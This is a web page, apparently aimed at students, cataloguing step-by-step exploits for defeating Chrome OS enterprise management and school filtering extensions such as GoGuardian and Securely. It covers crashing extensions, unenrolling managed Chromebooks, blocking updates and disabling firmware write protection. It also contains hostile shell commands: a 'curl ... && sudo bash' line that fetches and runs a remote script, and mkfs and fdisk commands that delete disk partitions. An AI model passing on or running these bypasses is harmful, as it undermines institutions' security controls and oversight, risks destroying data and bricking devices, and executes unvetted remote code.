cog

Home | All | The Bypassing | Gamellection | ProxList | Questions


This page is for Google Chrome/Chrome OS bypasses
For Windows exploits, see Bypasser’s Windowskit
Most web-based exploits will work on other Chromium based browsers



Table of Contents Alphabetic
App Diagnose Wi-Fi Bypass
BackAge
BadApple
BadRecovery
Baghdad
Blank3r
Blobe BM
BlobBypass
BlobWi-Fi
BR1CK
Browser Action Crasher
Buypass
ByeBlocker
Car Axle Client
CAUB
cauDNS
Chaos
Chriosk Dumping
Cookie Dough
Corkey
Crimson
CroshFi
Cryptosmite
DAUB
De-roll
Dextensify
Disable Manager
Downgration
E-Halcyon
Extension Launcher
ExtHang3r
ExtPrint3r
Fakemurk
Firmware Write Protection
Firmware2
GoGuardian GoAway
GuardianTabCrash
Hapara Focus Session Bypass
HSTS
Icarus Lite
Incognito Exploit
Ingot
INSECURELY
K1LL3R SP1D3R
Kernel Version Switcher
Killcurly
Locked Mode X
LoMoH
LTMEAT
Murkmod
NCOCrOS
OP Crosh
Point-Blank
Policy Password Tool
Pollen
Priism
Quickview
Revertion
Rigtools
Search Filter Bypass
Securely-Kill
Sidetracked
Sh0vel
SH1MMER
Shimboot
Sigill
Skebstore
SKIOVOX
Snap&Run
SOT
Source View
SWAB
Swamp Launcher
Sync Internals Password Extractor
Tr3nch
uBlock Run
uBoss
URL Unblocker
uRun
USBoot
Window of Opportunity

back to top



Any Web Proxy Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Alphabetic

proxy moment
Opens a proxy tab with about:blank cloaking.
Web-based exploit.


1: Make a bookmarklet with the link from xlak.github.io/alphabetic/ & run it.
2: Print the page (Ctrl+P), then cancel & click “try again”. A proxy tab will open.

back to top


Any OS Blocksi;GoGuardian;Hapara;iBoss;Securely App Diagnose Wi-Fi Bypass

Requires a app
a p p.
Chrome OS-based exploit.


1: Disable Wi-Fi.
2: Click "Sign in as Existing User".
3: Hold esc & click any app.
4: Click "Add Wi-Fi" & click any Wi-Fi.
5: Click "Diagnose" & go to Wi-Fi.
6: Click "Open in Settings", then close it.
7: Repeat step 2.

back to top


Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely ExtensionDevMode BackAge

Requires Extension Dev Mode
Freezes extensions.
Web-based exploit.


1: Go to chrome://extensions & enable Extension Dev Mode.
2: Click on the background page of the extension you want to block, then "Network", "Disable Cache", & "No Throttling".
3: Go to Settings & click on the "Disable javascript" box. Keep this tab open.
4: Disable "No Throttling".

back to top


Any OS Blocksi;GoGuardian;Hapara;iBoss;Securely DNSSettings Baghdad

Requires access to DNS settings
Browse web from the sign-in screen.
Chrome OS-based exploit.


1: Sign out & click the settings button located at the top right of the Wi-Fi panel.
2: Set "Name servers" to "Custom name servers".
3: Set the first Custom name servers to 150.136.163.0.
You'll see a link on the normal sign-in screen that says "Visit this network's sign-in page".
4: Click on "Webview link for tests".
5: Click "Diagnose" & go to Wi-Fi.

back to top


122 OS Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Browser Action Crasher

Patched on Chrome OS 123+
Crashes extensions.
OS-based exploit.


1: Pin the extension you want to disable, sign out, disable Wi-Fi, & log back in.
2: Quickly enable Wi-Fi, open Chrome, & spam the pinned extension for ~30 seconds.

back to top


Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely Buypass

Only lasts for 3 minutes.
Bypasses extensions for 3 minutes.
Web-based exploit.


1: Go to any of these links:

back to top


Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely chrome://network cauDNS

Requires chrome://network#state
Disables extensions.
Web-based exploit.


1: Go here & follow the instructions there.

back to top


Any Web Hapara InspectElement Chaos

Requires Devtools.
Confuses 1 of 3 extensions, bypassing Hapara Highlights & Hapara FIlter.
Web-based exploit.


1: Get the code from xlak.github.io/chaos/ & paste it in a new tab.
2: Inspect the page that loads.
3: Click on “Console” at the top & paste the script in.
4: When an inspect window pops up, paste the script in again.

back to top


Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Cookie Dough

Requires bookmarklets
Creates a loop to screw over extensions.
Web-based exploit.


1: Run this bookmarklet on the blocked page of your extension.

back to top


Any OS Blocksi;GoGuardian;Hapara;iBoss;Securely Powerwash Corkey

Requires powerwash.
Your extensions get corrupted & don't work.
Chrome OS-based exploit.


1: Powerwash your Chromebook.
2: Log into your Chromebook & immediately turn off Wi-Fi, then perform an instant restart (refresh+power).
3: Log back in & look for an option to log in as an existing user.
4: Go to chrome://extensions & turn on Wi-Fi.
5: Wait for your school’s blocking extension to appear. As soon as it does, turn off Wi-Fi & restart quickly.
6: Log back in, go back to extensions, & wait. If it says your blocking extension could be corrupted or doesn't appear at all, then it worked.

back to top


Any OS Blocksi;GoGuardian;Hapara;iBoss;Securely Powerwash Crimson

Doesn't work with a force install list; requires powerwash
Corrupts extensions.
OS-based exploit.


1: Powerwash your Chromebook.
2: Login & immediately disable Wi-Fi.
3: Go to chrome://settings/syncSetup/advanced & click "Customize Sync".
4: Turn off sync for Extensions & everything else.
5: Save changes & enable Wi-Fi.

back to top


134 Web Blocksi;GoGuardian;Hapara;iBoss;Securely chrome://extensions Dextensify

Memory leak unavoidable; patched on Chrome OS 135+
Disables extension with a memory leak.
Web-based exploit.


1: Go to chrome://extensions.
2: In a new tab, go to the settings page of the extension you want to disable.
3: In another tab, go here & click the “freeze extension button”.
4: Immediately switch back to chrome://extensions & spam the “allow access to file URLs” for a few seconds.
5: The extension is now disabled. You need to flip the switch a few times every couple of minutes, & you may need to reopen the Dextensify page every once in a while to prevent an unavoidable memory leak from crashing the system.

back to top


Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Disable Manager

Requires bookmarklets, Task Manager
Stop extensions form working with Task Manager & a bookmarklet.
Web-based exploit.


1: Open Task Manager & click on your blocker, then end its task.
2: Run either this or this bookmarklet on the newly unblocked page.

back to top


134 Web Blocksi;GoGuardian;Hapara;iBoss;Securely ExtHang3r

Patched on Chrome OS 135+
Hangs extensions. Similar to Dexextensiify & LTMEAT Flood Method.
Web-based exploit.


1: Go here & follow the instructions.

back to top


134 Web ExtPrint3r

Patched on Chrome OS 135+
Allows toggling of forced extensions by printing iframes. Based off LTMEAT Print method.
Web-based exploit.

ExtPrint3r.mp4

1: Open this link.
2: Look for your blocker on the list. If it isn't there, toggle "show all extensions" in the settings.
3: Click disable & follow the directions on the popup window. You'll need to do it very quickly.

If the extension switches back on, increase the iframe slider in the settings.

back to top


Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely GoGuardian GoAway

GoGuardian exclusive.
Disables GoGuardian.
Web-based exploit.


1: Go here.
2: Reload the page.
3: If you are left on an error screen, go to chrome://restart.

back to top


Any Web GoGuardian Bookmarklets;TabLimit GuardianTabCrash

Requires tab limit.
Crashes the admin's ability to remove tabs, though they can still see your screen.
Web-based exploit.


1: Create a bookmarklet with this code.
2: Spam click the bookmarklet while holding Ctrl.
3: If you’re asked to close the page, click no & prevent the page from making additional dialogues.

back to top


Any Web Hapara;iBoss chrome://net-internals HSTS

Requires chrome://net-internals access.
Bypasses extensions that also use a Chrome app. Hapara & iBoss are known to work.
Web-based exploit.


1: Go to chrome://net-internals & click the "Domain Security Policy" tab.
2: Insert 127.0.0.1 in the "Add HSTS domain’s Domain" textbox, then click "Add".
3: Repeat step 2, but use "localhost" instead of 127.0.0.1.
4: Restart your computer.

back to top


Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Hapara Focus Session Bypass

Requires data: links.
Bypasses Hapara's Focus Session.
Web-based exploit.


1: Create a bookmarklet with this code.
2: During a focus session, run the bookmarklet.

back to top


111 OS Blocksi;GoGuardian;Hapara;iBoss;Securely Killcurly

Patched on Chrome OS 112+
Chrome OS-based exploit.


1: Go to sign out.
2: Press the big blue button.
3: Restart your Chromebook.
4: Add your school account back.

back to top


Incognito Exploit
81 OS Blocksi;GoGuardian;Hapara;iBoss;Securely InspectElement Incognito 81

Patched on Chrome OS 82+
Allows you to enter Incognito mode.
Web-based exploit.


1: Enter your username & password, but don't sign in.
2: Press Alt+Shift+I & spam the "Privacy Policy" for ~30-60 seconds.
3: Login, quickly go to the Incognito tab, then press Ctrl+Shift+N.
4: Close the original Incognito tab.
5: If it continues to open policy pages, repeat Step 4.

127 OS Blocksi;GoGuardian;Hapara;iBoss;Securely chrome://flags Incognito 123-127

Patched on Chrome OS 127+
Allows you to enter Incognito mode.
Web-based exploit.


1: Enable the chrome://flags/#captive-portal-popup-window flag (v123-125)/chrome://flags/#temporary-unexpire-flags-m124 (v126)/chrome://flags/#temporary-unexpire-flags-m125 (v126-127) flag & restart. If the flag didn't reset, continue.
2: In Wi-Fi Settings, set Name Servers to Custom Name Servers & the first box to detectportal.firefox.com/captive.apple.com/150.136.163.0 (any one of these).
3: Click sign-in on the popup, then press Ctrl+T.
4: Revert the change to Name Servers.

back to top


105 Web Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Ingot

Patched on Chrome OS 106+
A menu to disable extensions & enable extension Dev Mode. The successor UI to LTBEEF.
Web-based exploit.


1: Make a bookmarklet with this code.
2: Go to https://chrome.google.com/webstorex & run the bookmarklet.

Any Web Securely INSECURELY

Patched on Securely versions above 2.98.55
A toggle that kills Securely using black magic.
Web-based exploit.


1: Go here & flip the switch.

back to top


110 Web Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets LoMoH

Doesn’t work with Hapara Highlights & Read&Write; patched on Chrome OS 111+
Uses locked mode to disable extensions. Formerly called Locked Mode Hack.
Web-based exploit.


1: Create a bookmarklet with this code & run it.

back to top


114 Web Blocksi;GoGuardian;Hapara;iBoss;Securely LTMEAT

Methods using (B) & (C) are patched on Chrome OS 115+ while the rest are patched on Chrome OS 135+
Crashes an extension's manifest file.
Web-based exploit.

Note: LTMEAT disables all extensions, not just your blocker.
Template URL: chrome-extension://ID/manifest.json
Extension IDs (Chrome):

If your blocker ID isn’t on this list, go to the extension page & copy the character string in the URL.

LTMEAT.mp4

1: Take the Template URL & replace "ID" with the extension ID. This is the extension's manifest page.
2: Go to the extension’s manifest page & bookmark it (A), as well as chrome://kill (B) & chrome://hang (C).
3: While on (A), click on (B).
4: Instantly start spamming (C) & reload.

Web Blocksi;GoGuardian;Hapara;iBoss;Securely Switch Method 1: While on (A), click on (B).
2: Duplicate the tab.
3: Go to the extension’s settings page.
4: Flip the "Allow access to file URLs" switch.


Web Blocksi;GoGuardian;Hapara;iBoss;Securely Chat Method 1: Wait until your teacher opens the chat window.
2: Spam X until it stops opening.
3: Flip the “Allow access to file URLs” switch.


Web Blocksi;GoGuardian;Hapara;iBoss;Securely Temporary Method 1: Create a new bookmark folder (spam.js) & inside that folder, make 38 bookmarks of the page chrome-extension://id/background.js (you can do this easily with the bookmark manager).
2: Go to chrome://settings/performance & turn memory saver off. Under “Keep these sites always active”, add chrome-extension://id/background.js.
3: On a new tab, right click (spam.js) & click “open all (38)”. Repeat this step, then duplicate the rightmost page & go to your blocker’s extension page..
4: Flip the “Allow access to file URLs” switch & go to the leftmost tab. Right click it & select “Close tabs to the right”. Keep the remaining background.js tab open.


Web Blocksi;GoGuardian;Hapara;iBoss;Securely Skid Method 1: Go to (A) & click on (C).
2: Duplicate the tab (right click on it & click “duplicate”).
3: Go to your blocker’s extension page & flip the “Allow access to file URLs” switch.


Web Blocksi;GoGuardian;Hapara;iBoss;Securely Web Method 1: Go here & follow the instructions there.


Web Blocksi;GoGuardian;Hapara;iBoss;Securely Wi-Fi Method 1: Go to your blocker's extension page.
2: Disable Wi-Fi.
3: Spam the “Allow access to file URLs” switch.
4: Enable Wi-Fi.
5: Spam pin your extension.

back to top


Web Blocksi;GoGuardian;iBoss;Securely Bookmarklets Point-Blank

N/A
Allows you to execute scripts using extensions, as well as hard & soft disable extensions.
Web-based exploit.


1: Create a bookmarklet with the code from here.
2: Go to one of these pages:
3: Click on the blue link & run the bookmarklet in the newly opened tab.

back to top


114 Web Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Quickview

Requires bookmarklets; patched on Chrome OS 115+
Loads pages without extensions.
Web-based exploit.


1: Create a bookmarklet by dragging the box that says “Quickview Launcher” from here into the Bookmarks Bar.
2: On that same page, double click the opener.
3: On the newly opened tab, run the bookmarklet.

back to top


128 Web Blocksi;GoGuardian;Hapara;iBoss;Securely Rigtools

Patched on Chrome OS 129+ Allows you to do a ton of things (with the right permissions).
Web-based exploit.

Rigtools.mp4

1: Keep this website open in a new tab.
2: Open this website & go to Network.
3: Double-click the black/grey box.
4: Click "extension-ID" & find your the extension ID of the extension you want to disable, then paste it in. It should load a filesystem: page. You can have other extensions under it.
5: Run this code. Note it won't work if your extension's manifest file doesn't have the proper permissions.

back to top


Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely Bookmarklets Sidetracked

Requires flag access; only works on Chrome OS 106+
Uses the unblocked sidebar to browse the web.
Web-based exploit; Chrome OS exclusive.


1: Go to chrome://flags#search-web-in-side-panel & enable it, then restart.
2: Open the side panel & select “google.com” from the drop own list.

back to top


Any Web; Blocksi;GoGuardian;Hapara;iBoss;Securely Sigill

Requires an extension with a textbox
Hangs extensions.
Web-based exploit.


1: Download the index.html & emoji files.
2: Insert the emoji file into the HTML file.
3: Click "Copy to Clipboard".
4: In a textbox from the extension you want to disable, do paste & after a second, do it again.
5: Immediately after, open a page related to the extension (such as the manifest file) & keep it open.

back to top


118 OS Blocksi;GoGuardian;Hapara;iBoss;Securely Kiosk SKIOVOX

Requires a kiosk app; Most methods patched on version 119
Opens a window inside of a kiosk app, which has different permissions & extensions.
Chrome OS-based exploit.

Skiovox.mp4

1: In the login screen, turn off your Wi-Fi.
2: If you have a password, type it in but don’t press enter.
3: Click on a kiosk app & press Alt+Shift+S instantly.
4: Wait until you get a “network unavailable screen”.
5: On the toolbar, click accessibility & then the ?.
If you see a “back” button proceed to method A (steps A-B), otherwise go to method B (steps C-E) or method C (steps F-H).

Method A:
A: Click “add other Wi-Fi network” & immediately press Esc twice & Enter. If you get a screen saying “multi sign-in is disab;ed”, press Esc to bypass it.
B: There may be an open window belonging to your school profile, you can close it. In the window behind it that has no extensions, click the 3 dots & then click “new window”. Use this window instead. Go to steps 14+.

Method B:
C: Press the “diagnose” button.
D: Just click “add other Wi-Fi network”. This is inconsistent, try a few times with a few apps or use steps 11-13.
E: Click Wi-Fi, then the settings link. Close this window to reveal a Chrome window. Go to steps 14+.

Method C:
F: Just click “add other Wi-Fi network”.
G: Turn on text-to-speech (Ctrl+Alt+Z). Hold the Search key & press O, then T.
H: Click “resources” & one of the 3 links to open Chrome. Once your browser is open, you can turn text to speech off. Go to steps 14+.
This exploit has some problems that can be fixed by the Skiovox Helper. A ZIP file of the extension is available on the GitHub page as well as here.
6: Go to chrome://extensions & enable extension Dev Mode. Click “load unpacked” & in the select a file menu, right click the ZIP file you downloaded earlier, & click “extract all”. Select the newly extracted folder to install the extension.


Other notes:
Problems without Skiovox Helper: The main difference between the results of method A (steps A-B) than method B (steps C-E) or method C (steps F-H) is method A can open multiple windows, while the others can’t.
If your screen keeps falling asleep every 5 seconds, try a different kiosk app.
Your files, bookmarks, & history won’t transfer over to the exploit & vice versa.
To exit the exploit, either hold down your power button & sign out or type chrome://quit in a new tab.

OS Blocksi;GoGuardian;Hapara;iBoss;Securely Kiosk 125/126 Method 1: Do the main methods steps 1-4.
2: Click the cog in the brightness settings instead.
3: Click on one of the links in Chromevox's Resources tab (Ctrl+Alt+Z), then disable it.
4: Click "Sign in as existing user" & login. If you don't see this, try a different kiosk app.
5: Press Esc on the "Multi user sign in disabled on this Chromebook" screen.
6: Turn on Wi-Fi & open a new window.
7: Go to main method steps 6+.

Note that any Incognito window is still monitored by your school.

back to top


Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely ExtensionAccess SOT

Requires extension access.
Uses OneTab & European witch magic to unblock websites.
Web-based exploit.


1: Download the OneTab extension.
2: Click the "import" button in the extension's settings tab.
3: Add the URL you wish to visit ~100 times, then click "import".
4: Spam click the top link, then either spam Esc on one of the opened tabs or wait for one to load on an about:blank page.

back to top


Any OS SWAB

Requires Name Servers.
I don't know man but it gets you an unblocked browser.
OS-based exploit.


1: Sign out & go to the Wi-Fi Settings.
2: Go to Name Servers & set it to "Custom Name Servers", then set at least 1 box to "52.207.185.90". If itdoesn't automatically save, reconnect 1-3 times.
3: If you see a "Network not available" page, click "Sign in as an existing user" & then back until you reach the login screen.
4: Underneath there should be a "Sign in with Google account" button. Click it & then "Forgot Email?".
5: It should now show a 400 error page, click the Google logo.

back to top


Any OS;Proxy Blocksi;GoGuardian;Hapara;iBoss;Securely DNSSettings Swamp Launcher

Requires access to DNS settings
Connects you to a proxy server.
Chrome OS-based exploit.


1: Open the DNS settings.
2: Select "custom name servers" & set all of the boxes to 0.0.0.0.
3: Wait 5 seconds, then change them to 150.136.6.90.
4: In Google, go here.
5: Reload the page (Ctrl+Shift+R), then go here on the same tab.
6: Click on the big red triangle in the middle of the page & type "thisisunsafe". If you fail, reload the page & repeat this step.
7: Repeat step one & select "automatic name servers".

back to top


Any Web Blocksi;iBoss Bookmarklets uBoss

Exclusive to iBoss & Blocksi
Tampers with iBoss.
Web-based exploit.


1: Create a bookmarklet with this code.
2: Go to one of these URLs: 3: Run the code & follow the instructions.

back to top


Any Web Blocksi;GoGuardian;Hapara;iBoss;Securely URL Unblocker

Requires editing to change website.
An unblocked alternative link.
Web-based exploit.


1: Take the URL of the site you want to visit & replace "URL" at the end of this.
2: Go to the URL.

back to top


Any Web; Blocksi;GoGuardian;Hapara;iBoss;Securely Window of Opportunity

Patched on Chrome OS 135+
Gives a very brief window of time where websites will be unblocked.
Web-based exploit.


1: Go to your blocker's extension & flip the "Allow Access to File URLS" switch. You will have a very short window to access websites.

back to top



Miscellaneous

132 OS;Unenrollment miniOS BadApple

Requires miniOS; patched on Chrome OS 133+
Chrome OS-based exploit.

BadApple.mp4

1: Enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked) & then reenter Recovery Mode.
2: Select "Internet Recovery" & reconnect to the same Wi-Fi network if needed.
3: When connected, press Ctrl+Alt+F3.

You now have a shell you can run things in.

back to top


124 OS;Unenrollment ExternalStorageDevice BadRecovery

Requires a storage device, another PC; patched on Chrome OS 125+ & kernver 4+ & keyrolled devices
Chrome OS-based exploit.

BadRecovery.mp4

1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4+, your Chromebook is unsupported.
3: Download a bin from chrome100.dev.
4: Go here & upload it, then flash it.
5: Enter Recovery Mode (Esc+Refresh+Power). If you're using the unverified payload, you must also enter developer mode, & then enter recovery mode again. On Cr50 devices, you must NOT be in developer mode for unenrollment to work.
6: Insert the storage device.
Mode Operations:
image lmao

back to top


Any Web Bookmarklets Blank3r

about:blank
Allows you to run bookmarklets on privileged pages.
Web-based exploit.

Blank3r.mp4

1: Make a bookmarklet with this code.
2: Go to chrome://extensions & click on an extension.
3: Click “view in Chrome Web Store” & spam escape. If it loads into a blank screen, run the bookmarklet.
4: Keep this tab open.

Any Web Blobe BM

Not compatable with every bookmarklet by design
Runs bookmarklets.
Web-based exploit.


1: Go here & follow the instructions.

back to top


Any Web BlobBypass

Requires BlobWi-Fi
Removes bypasses blockings.
Web-based exploit.


1: Use BlobWi-Fi & go here.
Notes:

back to top


Any Web chrome://network BlobWi-Fi

Requires chrome://network
Removes network level blocking.
Web-based exploit.


1: Go to chrome://network#state.
2: Find the managed Wi-Fi under "Favorite Networks".
3: Click the "+" & copy all the text.
4: Go here & paste the test into the bar, then click "Download".
5: Go to chrome://network#general & import the ONC file.

back to top


131 OS;Unenrollment ExternalStorageDevice BR1CK

Certain boards are incompatible (see here); patched on Chrome OS 132+ & keyrolled devices
Unenrolls your Chromebook.
OS-based exploit.

BR1CK.mp4

1: Powerwash (Esc+Power+Refresh then Ctrl+D) & return to Secure Mode.
2: Go to chrome://network#logs & check all boxes under the options section.
3: Place the combined-logs.tar.gz file in here. If you don't have access, the time will be ~1-1.5 seconds less than the time it takes to enroll.
4: Sign out & powerwash again, but use Ctrl+Alt+Shift+R instead.
5: When the "Enterprise Enrollment" screen appears, wait untul you're in the higher time range & perform an EC-Reset (Power+Refresh).
6: If you get a screen prompting you for recovery ("Chrome OS is missing or damaged" or "Something went wrong"), continue.
7: Preform SH1MMER (Legacy).

A: While you're here, disable the 5 minute Dev Mode wait.

8: Select Deprovision (D), then type "B" to open a bash shell.
9: Run this command: "gsctool -a -o" & press the power button when it spams "Press PP button now!".
10: Reenter Dev Mode, then when the "Enterprise Enrollment" screen shows up again enter Recovery Mode & boot into SH1MMER.
11: Run deprovision (D) & then reboot (E).

back to top


Any Web Bookmarklets Car Axle Client

Requires bookmarklets
A menu with games, exploits, & bookmarklets.
Web-based exploit.


1: Make a bookmark with the code from here & run it on any page.

This exploit was discovered by penguinify on GitHub.

back to top


127 Web chrome://network CAUB

Has to be done for each Wi-Fi network; patched on Chrome OS 128+
Prevents your Chromebook from automatically updating.
Web-based exploit.

CAUB.mp4

1: Go to chrome://network#state & scroll to the bottom.
2: Click the "+" by the name of the Wi-Fi network.
3: Copy the whole page (Ctrl+A then Ctrl+C).
4: Go to caub.glitch.me & paste it into the text box.
5: Click "generate onc" & download the file.
6: Go to chrome://network#general & import the onc file.

127 Web chrome://network Flag Method

Requires chrome://flags access; patched on Chrome OS 128+
Chrome OS-based exploit.


1: Go to chrome://flags#show-metered-toggle & enable it.
2: Open Settings & go to Network >> Your Wi-Fi >> Advanced >> Show metered toggle & turn it on.

back to top


Any OS DevMode;ExternalStorageDevice Chriosk Dumping

Requires Crosh, Dev Mode
Dump any kiosk app & then make it a regular Chrome OS app.
Chrome OS-based exploit.

ChrioskDumping.mp4

1: Enable Dev Mode, then add your home & then your school account.
2: Open Crosh (Crtl+Alt+T) & run "shell", then go to "/home/chronos/{user account hash}/extentions/kiosk/" & find the ID of the kiosk app you want to dump.
TestNav: mdmkkicfmmkgmpkmkdikhlbggogpicma
SecureTestBrowser: hblfbmjdaalalhifaajnnodlkiloengc
NWEA: omkghcboodpimaoimdkmigofhjcpmpeb
CollegeBoard: joaneffahikmmipmidpkeedopejmhbbm
3: Back it up to your downloads folder by running "cp /home/chronos/{user account hash}/extentions/kiosk/(app ID) /home/chronos/{user account ID hash}/Downloads/".
4: Go into the folder & edit the "manifest.json" file. Delete the "kiosk_only" : true" line.
5: Load the folder with Extension Dev Mode in chrome://extensions (click "Load Unpacked").

back to top


119 OS;Unenrollment ExternalStorageDevice Cryptosmite

Requires a storage device, another PC; patched on kernver 3+ & keyrolled devices
Unenrolls your Chromebook, removing ALL restrictions.
Chrome OS-based exploit.

Cryptosmite.mp4

1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 3+, your Chromebook is unsupported.
3: Downgrade to 118. If you're on a version before 118, stay on it.
4: Download an injected RMA Shim from here build your own.
5: Flash the injected RMA Shim onto a USB device.
6: Enter Dev Mode (Ctrl+D).
7: Reenter Recovery Mode & plug in the storage device.
8: Navigate to the Cryptosmite payload, press enter, then Y.

back to top


Any OS DAUB

Might not work
Prevents your Chromebook from automatically updating by deleting the update partitions. Also blocks kernver updates.
OS-based exploit.

DAUB.mp4

1: Access a shell (via methods such as SH1MMER or BadApple):
2: Run the following (3rd will open a prompt):
cgpt add /dev/mmcblk0 -i 2 -P 10 -T 5 -S 1
yes | mkfs.ext4 /dev/mmcblk0p1
fdisk /dev/mmcblk0
d
4
{just press enter}
d
5
{just press enter}
w

back to top


Any OS ExtensionAccess;ExternalStorageDevice;RecoveryMode Downgration

Requires a storage device; extension access required; Mostly Limited
Downgrade your Chromebook.
Chrome OS-based exploit.

Downgration.mp4

1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 0 or 1, your Chromebook can downgrade to any version. Otherwise, it's limited.

Minimum versions:

0/1: N/A

2: 112

3: 120

4: 125

5: 132

fwver 2 versions are 114+ 3: Go to chrome://version & check your board (under platform).
4: Go to chrome100.dev & find your board (use Ctrl+F) or find the bins here.
5: Download the version of Chrome OS you want.
6: Install the Chromebook Recovery Utility extension & run it.
7: Plug in the storage device & follow the instructions.
8: On your Chromebook, enter Recovery Mode (Esc+Reload+Power) & follow the prompts.
9: Skip the "Checking for Updates" screen by pressing Ctrl+Shift+E.

back to top


129 OS;Unenrollment ExternalStorageDevice;RecoveryMode E-Halcyon

Requires a storage device; patched on Chrome OS 130+ & keyrolled devices
Boots into an unenrolled Chrome OS environment.
Chrome OS-based exploit.

E-Halcyon.mp4

1: Download a Chrome OS 107 bin from chrome100.dev & inject it yourself or download one from here.

A: Open a terminal & run "git clone https://github.com/MercuryWorkshop/RecoMod", "cd RecoMod", "chmod +x recomod.sh", & "sudo ./recomod.sh -i /path/to/recovery/image.bin --halcyon --rw_legacy".

2: Flash it onto a storage device.
3: Enter Recovery Mode (Esc+Refresh+Power) & plug in the storage device.
4: Spam E until you get a 5 minute wait sequence, then spam E again near the end of it.
5: Navigate to "activate halycon enviroment" & press enter, then navigate to "install halycon semi-tethered". Navigate back to "activate halycon envirement" & select "Boot halycon semi-tethered".

You can no longer boot Chrome OS normally, & will have to use the storage device every time.

back to top


Any Web Bookmarklets Extension Launcher

Doesn’t work with blocklist/banlist
Installs an extension without using the webstore.
Web-based exploit.

ExtensionLauncher.mp4

1: Make a bookmarklet with the code from here.
2: Go here & run the bookmarklet.
3: Find an extension you want to download.
4: Right-click the image to the left of the title & select "Copy image address". Paste the image address into the first bar.
5: Type the name of the extension into the second bar.
6: Copy the extension ID (string of random letters in the address bar). Paste it into the third bar.
7: Click "Download".

Visit the Extension Information page for information on some extensions.

back to top


Any Hardware Firmware Write Protection Disabling FWWP allows you to do many things, including flashing custom firmware (allowing for installation of Linux, Windows, etc.) & setting GBB flags.

The method to disable FWWP depends on your Chromebook, however if you've been on v114 or above you must use Pencil method. History of FWWP:
PreCr50: these old boards used either a screw, a jumper, or a switch on the motherboard & are some of the simplest out there. If you happen to be lucky enough, I recommend trying this.
Cr50: following this, a new chip was added known as the Cr50. Older Cr50 Chromebooks set FWWP to the battery sense line, while later ones require everybody's favorite Pencil method. You can also use Closed Case Debugging/SuzyQable on all of these, as long as you're unenrolled.
Ti50: the generation 2 Cr50 chip, better known as the Ti50, now verifies the RO portion of the fimware at boot, meaning you need to run a few commands to prevent bricking. Regardless of wether a Ti50 device supports another method, you must use CCD/SuztQable (unenrolled) or Pencil Sharpener (patched on v136).

Any Hardware Screwdriver Screw; possibly patched on fimware 2+

Requires screwdriver

1: Turn your Chromebook off & unscrew the back cover.
2: Locate & use unscrew on the WP screw.
3: Screw the back cover back on.

Any Hardware Screwdriver Jumper

Requires screwdriver, bridger; possibly patched on fimware 2+

1: Turn your Chromebook off & unscrew the back cover.
2: Disconnect the internal battery cover.
3: Locate & bridge the area with for the WP jumper.
4: Reassemble the device.

Any Hardware Screwdriver Battery

Requires screwdriver; possibly patched on fimware 2+

1: Turn your Chromebook off & unscrew the back cover.
2: Unplug the power cord connecting the battery & motherboard.
3: Run the nessesary commands. If you're on v136+ you should probably change device secret.

Save device secret: vpd -i RO_VPD -l
Change device secret: vpd -i RO_VPD -s stable_device_secret_DO_NOT_SHARE=device_secret

4: Plug the power cord back in & screw the back cover on (or just leave it off you fucking psycho).

Any Hardware Screwdriver Pencil

Requires Cr50, screwdriver, bridger, external storage device

1: oh fuck no not yet
save device secret: vpd -i RO_VPD -l
change device secret: vpd -i RO_VPD -s stable_device_secret_DO_NOT_SHARE=$(openssl rand -hex 32)

Any Hardware Debug Cable Closed Case Debugging/SuzyQable

Requires Dev Mode, debug cable; doesn't work with active FWMP

1: Enter Dev Mode, then open the VT2 Shell (Ctrl+Alt+F2 on login screen).
2: Login as root & run "gsctool -a -o".
3: You will be prompted to press the physical presense (PP) button multiple times, on most devices this is the power button.
4: Upon completion, you will see the message "PP Done!" confirming CCD enabling. Return to Dev Mode & the VT2 shell.
5: Login as root again, plug in the debug cable & run "ls /dev/ttyUSB*"; this should return with ttyUSB0, ttyUSB1, & ttyUSB2 if the cable is correctly connected.
6: Run "echo "wp false" > /dev/ttyUSB0" & "echo "wp false atboot" > /dev/ttyUSB0" to disable WP, then run "echo "ccd reset factory" > /dev/ttyUSB0", which allows you to unbrick the device with CCD & also is required for Ti50 computers.
7: Run "gsctool -a -I" to verify the CDD is opened & factory values are set; it should all be currently set to "Y/Always".
8: Run "crossystem wpsw_cur" & verify it returns 0, then reboot.

Unbricking Ti50s: hold the power button, on Chromebooks press F2 twice or on Chromeboxes press the recovery pinhole instead, then release the power button & repeat.

GBB flags

Requires disabled FWWP

These allow you to edit certain things, such as the Dev Mode wait timer, disable FWMP (unenroll), force enable certain things such as USB booting, & more.
1: Go to the GBB Flaginator to easily set select flags to set.
2: Run "futility gbb -s --flash --flags=0x120b7" on newer devices & "/usr/share/vboot/bin/set_gbb_flags.sh 0x120b7" on older ones to set flags. You can read them with "futility gbb -g --flash --flags"/"/usr/share/vboot/bin/get_gbb_flags.sh" respectively.

back to top


Any OS Dev Mode;dFWWP Firmware2

Requires Dev Mode, FWWP disabled
Dekeyrolls your device. Not the same as firmware 2, the updated version of Chromebook firmware included in v114+
Chrome OS-based exploit.


1: Enter the VT2 shell (Ctrl+Alt+F2), then sign in as chronos & run "curl -LO https://raw.githubusercontent.com/Cruzy22k/Firmware2/main/firmware.sh && sudo bash firmware.sh".

back to top


125-129 OS;Unenrollment ExternalPC;ExternalStorageDevice;Powerwash;RecoveryMode Icarus Lite

Requires a storage device, another PC; requires Chrome OS 125-129
Unenrolls devices with device management interception using a proxy & a custom Certificate Authority.
